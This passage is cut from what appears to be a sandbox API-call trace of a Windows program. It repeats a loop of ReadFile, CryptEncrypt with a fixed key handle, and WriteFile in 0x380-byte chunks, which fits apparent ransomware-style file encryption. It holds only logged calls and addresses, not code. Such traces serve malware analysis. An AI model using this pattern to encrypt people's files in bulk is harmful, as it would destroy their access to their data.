lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.241] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.241] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.241] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.241] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.241] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.241] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.241] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.241] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.241] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.242] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.242] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.242] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.242] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.242] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.242] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.242] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.242] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.242] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.242] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.242] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.242] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.242] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.242] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.242] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.242] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.242] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.242] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.243] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.243] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.243] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.243] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.243] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.243] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.243] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.243] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.243] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.243] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.243] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.243] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.243] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.243] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.243] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.243] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.243] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.243] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.243] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.244] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.244] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.244] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.244] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.244] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.244] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.244] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.244] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.244] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.244] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.244] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.244] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.244] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.244] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.244] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.244] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.244] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.244] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.244] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.244] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.245] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.245] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.245] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.245] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.245] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.245] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.245] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.245] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.245] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.245] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.245] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.245] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.245] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.245] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.245] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.245] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.245] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.245] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.246] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.246] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.246] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.246] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.246] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.246] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.246] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.246] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.246] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.246] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.246] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.246] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.246] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.246] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.246] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.247] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.247] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.247] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.247] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.247] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, 